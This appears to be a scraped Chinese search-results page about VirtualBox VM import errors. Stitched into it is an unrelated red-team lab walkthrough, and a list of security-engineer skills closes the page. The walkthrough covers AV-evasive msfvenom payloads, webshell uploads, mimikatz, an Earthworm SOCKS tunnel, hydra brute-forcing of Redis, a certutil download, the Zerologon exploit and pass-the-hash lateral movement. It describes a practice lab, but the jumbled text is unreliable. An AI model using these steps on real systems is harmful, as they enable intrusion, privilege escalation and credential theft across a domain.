virtualbox导入不了虚拟实验室
Oracle VM VirtualBox导入虚拟机失败踩坑(cannot be c...
3月22日:将virtualbox在控制面板删除,并删除附带的这两个文件。(可能只删除这俩也可以)。重新安装,重新导入...
知乎
...博客 - virtualbox导入虚拟机失败什么原因
9月10日解决virtualbox导入虚拟机报错E_INVALIDARG (0x80070057)问题 安装区域的磁盘空间没有OVF或者OVA大了,清理一下垃圾。 macro99...
CSDN编程社区
virtualbox导入不了虚拟实验室 - 移动设备专家答疑 - 问一问
在线
2226位电子数码答主在线答
已服务超1.5亿人5分钟内回复
Hi,为您实时解答电子数码类软硬件等问题,与数码行家、发烧友1对1在线沟通
virtualbox导入不了虚拟实验室
马上提问
问一问
VirtualBox导入虚拟机错误e - invalidarg (0x80070057) 使用管...
5月16日手动删除了虚拟机文件,导致virtualbox找不到之前的虚拟介质删除后重新导入即可...
CSDN编程社区
Virtualbox导入虚拟机 - 爱码网
1. 打开Virtualbox,点击管理
2. 点击导入虚拟电脑
爱码网
virtualbox导入vmware虚拟机
virtualbox种导出电脑为 .ova格式镜像 要导入 Oracle VirtualBox 中运行的虚拟机,必须将该虚拟机从 ...
安装VirtualBox和导入虚拟电脑出现的问题 - 爱码网
第一个:系统加速配置页已启动硬件虚拟化,但主机并不支持,需要禁用硬件虚拟化才能启动虚拟机 看好多博客说去系统–》硬件加速—》取消勾选能解决问题,但是
第二个:the virtual machine is configured to use graphics controller other than recommended one (VMSVGA).Please consider switching unless you hava a reason
爱码网
解决virtualbox导入虚拟机报错E - INVALIDARG (0x80070...
1. 问题说明 导入虚拟机报错E_INVALIDARG (0x80070057)
2. 解决方法 virtualbox–管理–虚拟介质管理器 将带叹号报错的项都删除 无法删除的尝试释放 原因应该为,手动删除了虚拟机文件,导致virtualbox找不到之前的虚拟
CSDN编程社区
04-virtualbox-导入虚拟机镜像
277次播放
05:30
合集
半小时快速搭建网络攻防环境-Kali操作
哔哩哔哩
2020年01月22日
virtualbox安装虚拟机教程,简单易学详细
2565次播放
10:32
安全攻防实战系列MSF
前言
在红队攻防中,我们主要在外网进行信息收集,通过cms或者其他漏洞拿到shell,之后通过免杀木马将windows或linux服务器上线到cobalt strike或msf等c2服务器,之后对内网进行信息收集并绘制网络拓扑图,进行工作组或域渗透,拿到各个网段机器的权限,远程登陆并截图证明。
环境配置
从虚拟机网络来看
机器描述
目录如下
蚁剑拿shell
msf免杀拿shell
使用msfvenom生成免杀木马payload,里面的IP和端口自行修改,就是反弹shell的kali
使用分离免杀工具生成loader.exe文件
对生成的exe文件进行加壳免杀
免杀效果如下
免杀之后通过蚁剑上传到server-bt上
msf开启监听
蚁剑运行
getuid
ps
msf内网渗透
load mimikatz # 加载Mimikatz模块
成功开启了远程桌面,并且生成了一个txt文件,这个txt文件往后可用来关闭远程桌面,关闭命令
run multi_console_command -r /root/.msf4/loot/xx_default_192.168.1.5_host.windows.cle_xxx5.txt
绕过火绒添加用户
蚂蚁剑或者cs上传添加用户.exe
远程登录server-bt
然后再添加一个由system权限下开启的桌面进程
Earthworm穿透
上传EW(Earthworm)到C:/wwwroot/
kali环境进行爆破
proxychains hydra -P /usr/xxx/password.lst 192.168.59.4 redis 6379
利用过程
代理蚁剑进行连接这个shell
并查看权限
Earthworm穿透
挂代理,通过之前上传的EW(Earthworm)
服务器端执行以下命令(关掉server-bt的防火墙代理才能生效)
execute C:\wwwroot\ew.exe -s ssocksd -l 1090
用msfvenom生成一个正向马传进去(因为无法访问外网,反向出不来),msf正向连接。
使用分离免杀工具生成loader.exe文件
免杀效果如下
C:\ProgramData\xxxx.exe -i -c "certutil -urlcache -split -f msf1.exe
成功获取服务器的shell,之后就是各种权限维持了。创建计划任务、开机自启等等都能够实现。
ps
添加账户和远程连接同第一层
load mimikatz # 加载Mimikatz模块
这里已经满足触发zerologon的两个条件,能ping通域控制器,知道域控计算机名,当然最后dump出域内所有hash的时候需要域名
置空域控机器用户NTLM hash
proxychains python3 cve-2020-1472-exploit.py 12server-dc$ 10.10.10.201
接下来用置空的机器账户dump所有hash
(890c这个hash就是"空"的NTML hash)
我们的目标是获得域内administrator的hash,然后就可以hash传递,登陆任意域内机器
利用 psexec(PTH)上线server-dc到 MSF:
成功获取到shell
利用 psexec 上线server-ex13到 MSF:
网络安全工程师需要学什么
网络安全工程师需要学的内容:
1、网络安全基础:网络基础、虚拟机、数据包分析、常用协议、内网穿透、隧道技术等。
2、Linux:Linux系统文件、用户、进程、日志、常用服务(HTTP、ftp、dns、SMTP等)。
3、Python编程:Python用法基础、字符串、列表和元组、面向对象、文件和输入输出、网络编程、web编程等。
4、数据库:MySQL、msSQL、Oracle。
5、web脚本基础:html、css、js、asp、PHP、jsp等。
6、web渗透与攻防:OWASP、TOP10、XSS、CSRF、SQL注入、文件上传/包含、命令注入等。
7、逆向工程:逆向工具(ollydbg、softice、windbg)、软件保护与破解、杀毒与免杀。
8、软件漏洞挖掘:堆栈溢出原理与实践、shellcode、fuzz、漏洞分析。
9、社会工程学:信息收集、伪装、诱导、心理战术、说服力、社会工程学工具等。
10、渗透测试:信息获取、扫描与服务识别、漏洞验证、无限安全、嗅探攻击、代理与隧道、metasploit渗透攻击等。
0条大神的评论